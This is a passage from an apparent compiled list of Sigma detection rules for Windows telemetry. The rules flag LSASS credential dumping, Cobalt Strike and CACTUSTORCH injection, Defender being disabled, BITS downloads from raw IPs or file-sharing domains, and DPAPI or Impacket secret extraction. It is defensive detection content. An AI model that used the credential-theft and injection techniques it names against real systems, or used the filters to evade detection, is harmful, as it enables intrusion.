TargetImage|endswith: \NGenTask.exe
filter_optional_githubdesktop:
SourceImage|contains|all:
- :\Users\
- \AppData\Local\GitHubDesktop\app-
SourceImage|endswith:
- \GitHubDesktop.exe
- \resources\app\git\usr\bin\sh.exe
TargetImage|contains|all:
- :\Users\
- \AppData\Local\GitHubDesktop\app-
filter_optional_teams_to_update:
SourceImage|endswith: \AppData\Local\Microsoft\Teams\stage\Teams.exe
TargetImage|endswith: \AppData\Local\Microsoft\Teams\Update.exe
filter_optional_teams_update_regsvr32:
SourceImage|endswith: \AppData\Local\Microsoft\Teams\Update.exe
TargetImage|endswith: :\WINDOWS\SysWOW64\regsvr32.exe
filter_optional_teams_update_to_teams:
SourceImage|endswith: \AppData\Local\Microsoft\Teams\Update.exe
TargetImage|endswith: \AppData\Local\Microsoft\Teams\stage\Teams.exe
filter_optional_thor:
SourceImage|endswith:
- \thor.exe
- \thor64.exe
selection:
CallTrace|contains: '|UNKNOWN('
CallTrace|endswith: )
CallTrace|startswith: C:\Windows\SYSTEM32\ntdll.dll+
GrantedAccess: '0x1FFFFF'
HackTool - CobaltStrike BOF Injection Pattern
- source: sigma
- technicques:
- t1106
- t1562
- t1562.001
Description
Detects a typical pattern of a CobaltStrike BOF which inject into other processes
Detection logic
condition: selection
selection:
CallTrace|re: ^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$
GrantedAccess:
- '0x1028'
- '0x1fffff'
HackTool - LittleCorporal Generated Maldoc Injection
- source: sigma
- technicques:
- t1055
- t1055.003
- t1204
- t1204.002
Description
Detects the process injection of a LittleCorporal generated Maldoc.
Detection logic
condition: selection
selection:
CallTrace|contains|all:
- :\Windows\Microsoft.NET\Framework64\v2.
- UNKNOWN
SourceImage|endswith: \winword.exe
UAC Bypass Using WOW64 Logger DLL Hijack
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Detection logic
condition: selection
selection:
CallTrace|startswith: UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|
GrantedAccess: '0x1fffff'
SourceImage|contains: :\Windows\SysWOW64\
Suspicious LSASS Access Via MalSecLogon
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects suspicious access to LSASS handle via a call trace to “seclogon.dll” with a suspicious access right.
Detection logic
condition: selection
selection:
CallTrace|contains: seclogon.dll
GrantedAccess: '0x14c0'
SourceImage|endswith: \svchost.exe
TargetImage|endswith: \lsass.exe
Suspicious Svchost Process Access
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects suspicious access to the “svchost” process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_msbuild:
CallTrace|contains:
- Microsoft.Build.ni.dll
- System.ni.dll
SourceImage|contains: :\Program Files\Microsoft Visual Studio\
SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe
selection:
CallTrace|contains: UNKNOWN
GrantedAccess: '0x1F3FFF'
TargetImage|endswith: :\Windows\System32\svchost.exe
Potential Direct Syscall of NtOpenProcess
- source: sigma
- technicques:
- t1106
Description
Detects potential calls to NtOpenProcess directly from NTDLL.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_generic:
SourceImage|contains:
- :\Program Files (x86)\
- :\Program Files\
- :\Windows\System32\
- :\Windows\SysWOW64\
- :\Windows\WinSxS\
TargetImage|contains:
- :\Program Files (x86)\
- :\Program Files\
- :\Windows\System32\
- :\Windows\SysWOW64\
- :\Windows\WinSxS\
filter_main_kerneltrace_edge:
Provider_Name: Microsoft-Windows-Kernel-Audit-API-Calls
filter_main_vcredist:
SourceImage|endswith: vcredist_x64.exe
TargetImage|endswith: vcredist_x64.exe
filter_optional_adobe_acrobat:
SourceImage|contains: :\Program Files\Adobe\Acrobat DC\Acrobat\
SourceImage|endswith: \AcroCEF.exe
TargetImage|contains: :\Program Files\Adobe\Acrobat DC\Acrobat\
TargetImage|endswith: \AcroCEF.exe
filter_optional_amazon:
SourceImage|endswith: AmazonSSMAgentSetup.exe
TargetImage|endswith: AmazonSSMAgentSetup.exe
filter_optional_cylance:
SourceImage|endswith: :\Windows\Explorer.EXE
TargetImage|endswith: :\Program Files\Cylance\Desktop\CylanceUI.exe
filter_optional_discord:
TargetImage|contains: \AppData\Local\Discord\
TargetImage|endswith: \Discord.exe
filter_optional_evernote:
TargetImage|endswith: \Evernote\Evernote.exe
filter_optional_teams:
SourceImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe
TargetImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe
filter_optional_vmware:
SourceImage|endswith: setup64.exe
TargetImage|endswith: :\Windows\system32\systeminfo.exe
filter_optional_vscode:
SourceImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe
TargetImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe
filter_optional_yammer:
GrantedAccess: '0x1000'
SourceImage|contains: \AppData\Local\yammerdesktop\app-
SourceImage|endswith: \Yammer.exe
TargetImage|contains: \AppData\Local\yammerdesktop\app-
TargetImage|endswith: \Yammer.exe
selection:
CallTrace|startswith: UNKNOWN
LSASS Access From Potentially White-Listed Processes
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
Detection logic
condition: selection
selection:
GrantedAccess|endswith:
- '10'
- '30'
- '50'
- '70'
- '90'
- B0
- D0
- F0
- '18'
- '38'
- '58'
- '78'
- '98'
- B8
- D8
- F8
- 1A
- 3A
- 5A
- 7A
- 9A
- BA
- DA
- FA
- '0x14C2'
- FF
SourceImage|endswith:
- \TrolleyExpress.exe
- \ProcessDump.exe
- \dump64.exe
TargetImage|endswith: \lsass.exe
Credential Dumping Activity By Python Based Tool
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
Detection logic
condition: selection
selection:
CallTrace|contains:
- python27.dll+
- python3*.dll+
CallTrace|contains|all:
- _ctypes.pyd+
- :\Windows\System32\KERNELBASE.dll+
- :\Windows\SYSTEM32\ntdll.dll+
GrantedAccess: '0x1FFFFF'
TargetImage|endswith: \lsass.exe
Exports Registry Key To an Alternate Data Stream
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Exports the target Registry key and hides it in the specified alternate data stream.
Detection logic
condition: selection
selection:
Image|endswith: \regedit.exe
Unusual File Download from Direct IP Address
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects the download of suspicious file type from URLs with IP
Detection logic
condition: selection
selection:
Contents|re: http[s]?://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
TargetFilename|contains:
- .ps1:Zone
- .bat:Zone
- .exe:Zone
- .vbe:Zone
- .vbs:Zone
- .dll:Zone
- .one:Zone
- .cmd:Zone
- .hta:Zone
- .xll:Zone
- .lnk:Zone
HackTool Named File Stream Created
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects the creation of a named file stream with the imphash of a well-known hack tool
Detection logic
condition: selection
selection:
- Imphash:
- bcca3c247b619dcd13c8cdff5f123932
- 3a19059bd7688cb88e70005f18efc439
- bf6223a49e45d99094406777eb6004ba
- 0c106686a31bfe2ba931ae1cf6e9dbc6
- 0d1447d4b3259b3c2a1d4cfb7ece13c3
- 1b0369a1e06271833f78ffa70ffb4eaf
- 4c1b52a19748428e51b14c278d0f58e3
- 4d927a711f77d62cebd4f322cb57ec6f
- 66ee036df5fc1004d9ed5e9a94a1086a
- 672b13f4a0b6f27d29065123fe882dfc
- 6bbd59cea665c4afcc2814c1327ec91f
- 725bb81dc24214f6ecacc0cfb36ad30d
- 9528a0e91e28fbb88ad433feabca2456
- 9da6d5d77be11712527dcab86df449a3
- a6e01bc1ab89f8d91d9eab72032aae88
- b24c5eddaea4fe50c6a96a2a133521e4
- d21bbc50dcc169d7b4d0f01962793154
- fcc251cceae90d22c392215cc9a2d5d6
- 23867a89c2b8fc733be6cf5ef902f2d1
- a37ff327f8d48e8a4d2f757e1b6e70bc
- f9a28c458284584a93b14216308d31bd
- 6118619783fc175bc7ebecff0769b46e
- 959a83047e80ab68b368fdb3f4c6e4ea
- 563233bfa169acc7892451f71ad5850a
- 87575cb7a0e0700eb37f2e3668671a08
- 13f08707f759af6003837a150a371ba1
- 1781f06048a7e58b323f0b9259be798b
- 233f85f2d4bc9d6521a6caae11a1e7f5
- 24af2584cbf4d60bbe5c6d1b31b3be6d
- 632969ddf6dbf4e0f53424b75e4b91f2
- 713c29b396b907ed71a72482759ed757
- 749a7bb1f0b4c4455949c0b2bf7f9e9f
- 8628b2608957a6b0c6330ac3de28ce2e
- 8b114550386e31895dfab371e741123d
- 94cb940a1a6b65bed4d5a8f849ce9793
- 9d68781980370e00e0bd939ee5e6c141
- b18a1401ff8f444056d29450fbc0a6ce
- cb567f9498452721d77a451374955f5f
- 730073214094cd328547bf1f72289752
- 17b461a082950fc6332228572138b80c
- dc25ee78e2ef4d36faa0badf1e7461c9
- 819b19d53ca6736448f9325a85736792
- 829da329ce140d873b4a8bde2cbfaa7e
- c547f2e66061a8dffb6f5a3ff63c0a74
- 0588081ab0e63ba785938467e1b10cca
- 0d9ec08bac6c07d9987dfd0f1506587c
- bc129092b71c89b4d4c8cdf8ea590b29
- 4da924cf622d039d58bce71cdf05d242
- e7a3a5c377e2d29324093377d7db1c66
- 9a9dbec5c62f0380b4fa5fd31deffedf
- af8a3976ad71e5d5fdfb67ddb8dadfce
- 0c477898bbf137bbd6f2a54e3b805ff4
- 0ca9f02b537bcea20d4ea5eb1a9fe338
- 3ab3655e5a14d4eefc547f4781bf7f9e
- e6f9d5152da699934b30daab206471f6
- 3ad59991ccf1d67339b319b15a41b35d
- ffdd59e0318b85a3e480874d9796d872
- 0cf479628d7cc1ea25ec7998a92f5051
- 07a2d4dcbd6cb2c6a45e6b101f0b6d51
- d6d0f80386e1380d05cb78e871bc72b1
- 38d9e015591bbfd4929e0d0f47fa0055
- 0e2216679ca6e1094d63322e3412d650
- ada161bf41b8e5e9132858cb54cab5fb
- 2a1bc4913cd5ecb0434df07cb675b798
- 11083e75553baae21dc89ce8f9a195e4
- a23d29c9e566f2fa8ffbb79267f5df80
- 4a07f944a83e8a7c2525efa35dd30e2f
- 767637c23bb42cd5d7397cf58b0be688
- 14c4e4c72ba075e9069ee67f39188ad8
- 3c782813d4afce07bbfc5a9772acdbdc
- 7d010c6bb6a3726f327f7e239166d127
- 89159ba4dd04e4ce5559f132a9964eb3
- 6f33f4a5fc42b8cec7314947bd13f30f
- 5834ed4291bdeb928270428ebbaf7604
- 5a8a8a43f25485e7ee1b201edcbc7a38
- dc7d30b90b2d8abf664fbed2b1b59894
- 41923ea1f824fe63ea5beb84db7a3e74
- 3de09703c8e79ed2ca3f01074719906b
- a53a02b997935fd8eedcb5f7abab9b9f
- e96a73c7bf33a464c510ede582318bf2
- 32089b8851bbf8bc2d014e9f37288c83
- 09D278F9DE118EF09163C6140255C690
- 03866661686829d806989e2fc5a72606
- e57401fbdadcd4571ff385ab82bd5d6d
- 84B763C45C0E4A3E7CA5548C710DB4EE
- 19584675d94829987952432e018d5056
- 330768a4f172e10acb6287b87289d83b
- 885c99ccfbe77d1cbfcb9c4e7c1a3313
- 22a22bc9e4e0d2f189f1ea01748816ac
- 7fa30e6bb7e8e8a69155636e50bf1b28
- 96df3a3731912449521f6f8d183279b1
- 7e6cf3ff4576581271ac8a313b2aab46
- 51791678f351c03a0eb4e2a7b05c6e17
- 25ce42b079282632708fc846129e98a5
- 021bcca20ba3381b11bdde26b4e62f20
- 59223b5f52d8799d38e0754855cbdf42
- 81e75d8f1d276c156653d3d8813e4a43
- 17244e8b6b8227e57fe709ccad421420
- 5b76da3acdedc8a5cdf23a798b5936b4
- cb2b65bb77d995cc1c0e5df1c860133c
- 40445337761d80cf465136fafb1f63e6
- 8a790f401b29fa87bc1e56f7272b3aa6
- Hash|contains:
- IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932
- IMPHASH=3A19059BD7688CB88E70005F18EFC439
- IMPHASH=bf6223a49e45d99094406777eb6004ba
- IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6
- IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3
- IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF
- IMPHASH=4C1B52A19748428E51B14C278D0F58E3
- IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F
- IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A
- IMPHASH=672B13F4A0B6F27D29065123FE882DFC
- IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F
- IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D
- IMPHASH=9528A0E91E28FBB88AD433FEABCA2456
- IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3
- IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88
- IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4
- IMPHASH=D21BBC50DCC169D7B4D0F01962793154
- IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6
- IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1
- IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC
- IMPHASH=F9A28C458284584A93B14216308D31BD
- IMPHASH=6118619783FC175BC7EBECFF0769B46E
- IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA
- IMPHASH=563233BFA169ACC7892451F71AD5850A
- IMPHASH=87575CB7A0E0700EB37F2E3668671A08
- IMPHASH=13F08707F759AF6003837A150A371BA1
- IMPHASH=1781F06048A7E58B323F0B9259BE798B
- IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5
- IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D
- IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2
- IMPHASH=713C29B396B907ED71A72482759ED757
- IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F
- IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E
- IMPHASH=8B114550386E31895DFAB371E741123D
- IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793
- IMPHASH=9D68781980370E00E0BD939EE5E6C141
- IMPHASH=B18A1401FF8F444056D29450FBC0A6CE
- IMPHASH=CB567F9498452721D77A451374955F5F
- IMPHASH=730073214094CD328547BF1F72289752
- IMPHASH=17B461A082950FC6332228572138B80C
- IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9
- IMPHASH=819B19D53CA6736448F9325A85736792
- IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E
- IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74
- IMPHASH=0588081AB0E63BA785938467E1B10CCA
- IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C
- IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29
- IMPHASH=4DA924CF622D039D58BCE71CDF05D242
- IMPHASH=E7A3A5C377E2D29324093377D7DB1C66
- IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF
- IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE
- IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4
- IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338
- IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E
- IMPHASH=E6F9D5152DA699934B30DAAB206471F6
- IMPHASH=3AD59991CCF1D67339B319B15A41B35D
- IMPHASH=FFDD59E0318B85A3E480874D9796D872
- IMPHASH=0CF479628D7CC1EA25EC7998A92F5051
- IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51
- IMPHASH=D6D0F80386E1380D05CB78E871BC72B1
- IMPHASH=38D9E015591BBFD4929E0D0F47FA0055
- IMPHASH=0E2216679CA6E1094D63322E3412D650
- IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB
- IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798
- IMPHASH=11083E75553BAAE21DC89CE8F9A195E4
- IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80
- IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F
- IMPHASH=767637C23BB42CD5D7397CF58B0BE688
- IMPHASH=14C4E4C72BA075E9069EE67F39188AD8
- IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC
- IMPHASH=7D010C6BB6A3726F327F7E239166D127
- IMPHASH=89159BA4DD04E4CE5559F132A9964EB3
- IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F
- IMPHASH=5834ED4291BDEB928270428EBBAF7604
- IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38
- IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894
- IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74
- IMPHASH=3DE09703C8E79ED2CA3F01074719906B
- IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F
- IMPHASH=E96A73C7BF33A464C510EDE582318BF2
- IMPHASH=32089B8851BBF8BC2D014E9F37288C83
- IMPHASH=09D278F9DE118EF09163C6140255C690
- IMPHASH=03866661686829d806989e2fc5a72606
- IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d
- IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE
- IMPHASH=19584675D94829987952432E018D5056
- IMPHASH=330768A4F172E10ACB6287B87289D83B
- IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313
- IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC
- IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28
- IMPHASH=96DF3A3731912449521F6F8D183279B1
- IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46
- IMPHASH=51791678F351C03A0EB4E2A7B05C6E17
- IMPHASH=25CE42B079282632708FC846129E98A5
- IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20
- IMPHASH=59223B5F52D8799D38E0754855CBDF42
- IMPHASH=81E75D8F1D276C156653D3D8813E4A43
- IMPHASH=17244E8B6B8227E57FE709CCAD421420
- IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4
- IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C
- IMPHASH=40445337761D80CF465136FAFB1F63E6
- IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6
Unusual File Download From File Sharing Websites
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects the download of suspicious file type from a well-known file and paste sharing domain
Detection logic
condition: all of selection*
selection_domain:
Contents|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
selection_extension:
TargetFilename|contains:
- .ps1:Zone
- .bat:Zone
- .cmd:Zone
Potential Suspicious Winget Package Installation
- source: sigma
- technicques:
Description
Detects potential suspicious winget package installation from a suspicious source.
Detection logic
condition: selection
selection:
Contents|contains:
- ://1
- ://2
- ://3
- ://4
- ://5
- ://6
- ://7
- ://8
- ://9
Contents|startswith: '[ZoneTransfer] ZoneId=3'
TargetFilename|contains: \AppData\Local\Temp\WinGet\
TargetFilename|endswith: :Zone.Identifier
Potential Credential Dumping Attempt Via PowerShell Remote Thread
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects remote thread creation by PowerShell processes into “lsass.exe”
Detection logic
condition: selection
selection:
SourceImage|endswith:
- \powershell.exe
- \pwsh.exe
TargetImage|endswith: \lsass.exe
Remote Thread Created In KeePass.EXE
- source: sigma
- technicques:
- t1555
- t1555.005
Description
Detects remote thread creation in “KeePass.exe” which could indicates potential password dumping activity
Detection logic
condition: selection
selection:
TargetImage|endswith: \KeePass.exe
HackTool - Potential CobaltStrike Process Injection
- source: sigma
- technicques:
- t1055
- t1055.001
Description
Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
Detection logic
condition: selection
selection:
StartAddress|endswith:
- 0B80
- 0C7C
- 0C88
HackTool - CACTUSTORCH Remote Thread Creation
- source: sigma
- technicques:
- t1055
- t1055.012
- t1059
- t1059.005
- t1059.007
- t1218
- t1218.005
Description
Detects remote thread creation from CACTUSTORCH as described in references.
Detection logic
condition: selection
selection:
SourceImage|endswith:
- \System32\cscript.exe
- \System32\wscript.exe
- \System32\mshta.exe
- \winword.exe
- \excel.exe
StartModule: null
TargetImage|contains: \SysWOW64\
Remote Thread Creation In Uncommon Target Image
- source: sigma
- technicques:
- t1055
- t1055.003
Description
Detects uncommon target processes for remote thread creation
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_csrss:
SourceImage|endswith: :\Windows\System32\csrss.exe
filter_optional_aurora_1:
StartFunction: EtwpNotificationThread
filter_optional_aurora_2:
SourceImage|contains: unknown process
filter_optional_vmtoolsd:
SourceImage|endswith: :\Program Files\VMware\VMware Tools\vmtoolsd.exe
StartFunction: GetCommandLineW
TargetImage|endswith:
- :\Windows\System32\notepad.exe
- :\Windows\System32\spoolsv.exe
filter_optional_xerox_pjems:
SourceImage: C:\Program Files\Xerox\XeroxPrintExperience\CommonFiles\XeroxPrintJobEventManagerService.exe
StartFunction: LoadLibraryW
TargetImage: C:\Windows\System32\spoolsv.exe
selection:
TargetImage|endswith:
- \calc.exe
- \calculator.exe
- \mspaint.exe
- \notepad.exe
- \ping.exe
- \sethc.exe
- \spoolsv.exe
- \wordpad.exe
- \write.exe
Remote Thread Creation Via PowerShell In Uncommon Target
- source: sigma
- technicques:
- t1059
- t1059.001
- t1218
- t1218.011
Description
Detects the creation of a remote thread from a Powershell process in an uncommon target process
Detection logic
condition: selection
selection:
SourceImage|endswith:
- \powershell.exe
- \pwsh.exe
TargetImage|endswith:
- \rundll32.exe
- \regsvr32.exe
Remote Thread Creation Ttdinject.exe Proxy
- source: sigma
- technicques:
- t1127
Description
Detects a remote thread creation of Ttdinject.exe used as proxy
Detection logic
condition: selection
selection:
SourceImage|endswith: \ttdinject.exe
Remote Thread Creation In Mstsc.Exe From Suspicious Location
- source: sigma
- technicques:
Description
Detects remote thread creation in the “mstsc.exe” process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by “mstsc.exe” during RDP authentications in order to steal credentials.
Detection logic
condition: selection
selection:
SourceImage|contains:
- :\Temp\
- :\Users\Public\
- :\Windows\PerfLogs\
- :\Windows\Tasks\
- :\Windows\Temp\
- \AppData\Local\Temp\
TargetImage|endswith: \mstsc.exe
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
- source: sigma
- technicques:
- t1562
- t1562.004
Description
Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_block:
Action: 2
selection:
ApplicationPath|contains:
- :\PerfLogs\
- :\Temp\
- :\Tmp\
- :\Users\Public\
- :\Windows\Tasks\
- :\Windows\Temp\
- \AppData\Local\Temp\
EventID:
- 2004
- 2071
- 2097
Windows Defender Grace Period Expired
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
Detection logic
condition: selection
selection:
EventID: 5101
PSExec and WMI Process Creations Block
- source: sigma
- technicques:
- t1047
- t1569
- t1569.002
Description
Detects blocking of process creations originating from PSExec and WMI commands
Detection logic
condition: selection
selection:
EventID: 1121
ProcessName|endswith:
- \wmiprvse.exe
- \psexesvc.exe
Windows Defender Virus Scanning Feature Disabled
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects disabling of the Windows Defender virus scanning feature
Detection logic
condition: selection
selection:
EventID: 5012
Windows Defender Malware And PUA Scanning Disabled
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software
Detection logic
condition: selection
selection:
EventID: 5010
BITS Transfer Job Download From Direct IP
- source: sigma
- technicques:
- t1197
Description
Detects a BITS transfer job downloading file(s) from a direct IP address.
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_local_networks:
RemoteName|contains:
- ://10.
- ://192.168.
- ://172.16.
- ://172.17.
- ://172.18.
- ://172.19.
- ://172.20.
- ://172.21.
- ://172.22.
- ://172.23.
- ://172.24.
- ://172.25.
- ://172.26.
- ://172.27.
- ://172.28.
- ://172.29.
- ://172.30.
- ://172.31.
- ://127.
- ://169.254.
filter_optional_seven_zip:
RemoteName|contains:
- https://7-
- http://7-
selection:
EventID: 16403
RemoteName|contains:
- http://1
- http://2
- http://3
- http://4
- http://5
- http://6
- http://7
- http://8
- http://9
- https://1
- https://2
- https://3
- https://4
- https://5
- https://6
- https://7
- https://8
- https://9
BITS Transfer Job Download To Potential Suspicious Folder
- source: sigma
- technicques:
- t1197
Description
Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
Detection logic
condition: selection
selection:
EventID: 16403
LocalName|contains:
- \Desktop\
- C:\Users\Public\
- C:\PerfLogs\
BITS Transfer Job Download From File Sharing Domains
- source: sigma
- technicques:
- t1197
Description
Detects BITS transfer job downloading files from a file sharing domain.
Detection logic
condition: selection
selection:
EventID: 16403
RemoteName|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
SMB Create Remote File Admin Share
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).
Detection logic
condition: selection and not filter
filter:
SubjectUserName|endswith: $
selection:
AccessMask: '0x2'
EventID: 5145
ShareName|endswith: C$
Invoke-Obfuscation VAR+ Launcher - Security
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Environment Variables to execute PowerShell
Detection logic
condition: selection
selection:
EventID: 4697
ServiceFileName|contains:
- /c
- /r
ServiceFileName|contains|all:
- cmd
- '"set'
- -f
Protected Storage Service Access
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
Detection logic
condition: selection
selection:
EventID: 5145
RelativeTargetName: protected_storage
ShareName|contains: IPC
DPAPI Domain Backup Key Extraction
- source: sigma
- technicques:
- t1003
- t1003.004
Description
Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
Detection logic
condition: selection
selection:
AccessMask: '0x2'
EventID: 4662
ObjectName|contains: BCKUPKEY
ObjectType: SecretObject
Azure AD Health Monitoring Agent Registry Keys Access
- source: sigma
- technicques:
- t1012
Description
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
Detection logic
condition: selection and not filter
filter:
ProcessName|contains:
- Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe
- Microsoft.Identity.Health.Adfs.InsightsService.exe
- Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe
- Microsoft.Identity.Health.Adfs.PshSurrogate.exe
- Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe
selection:
EventID:
- 4656
- 4663
ObjectName: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent
ObjectType: Key
Active Directory Replication from Non Machine Account
- source: sigma
- technicques:
- t1003
- t1003.006
Description
Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
Detection logic
condition: selection and not filter
filter:
- SubjectUserName|endswith: $
- SubjectUserName|startswith: MSOL_
selection:
AccessMask: '0x100'
EventID: 4662
Properties|contains:
- 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
- 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
- 89e95b76-444d-4c62-991a-0facbeda640c
Register new Logon Process by Rubeus
- source: sigma
- technicques:
- t1558
- t1558.003
Description
Detects potential use of Rubeus via registered new trusted logon process
Detection logic
condition: selection
selection:
EventID: 4611
LogonProcessName: User32LogonProcesss
SCM Database Privileged Operation
- source: sigma
- technicques:
- t1548
Description
Detects non-system users performing privileged operation os the SCM database
Detection logic
condition: selection and not filter
filter:
ProcessName|endswith: :\Windows\System32\services.exe
SubjectLogonId: '0x3e4'
selection:
EventID: 4674
ObjectName: servicesactive
ObjectType: SC_MANAGER OBJECT
PrivilegeList: SeTakeOwnershipPrivilege
Possible Impacket SecretDump Remote Activity
- source: sigma
- technicques:
- t1003
- t1003.002
- t1003.003
- t1003.004
Description
Detect AD credential dumping using impacket secretdump HKTL
Detection logic
condition: selection
selection:
EventID: 5145
RelativeTargetName|contains|all:
- SYSTEM32\
- .tmp
ShareName: \\\\\*\\ADMIN$
Replay Attack Detected
- source: sigma
- technicques:
- t1558
Description
Detects possible Kerberos Replay Attack on the domain controllers when “KRB_AP_ERR_REPEAT” Kerberos response is sent to the client
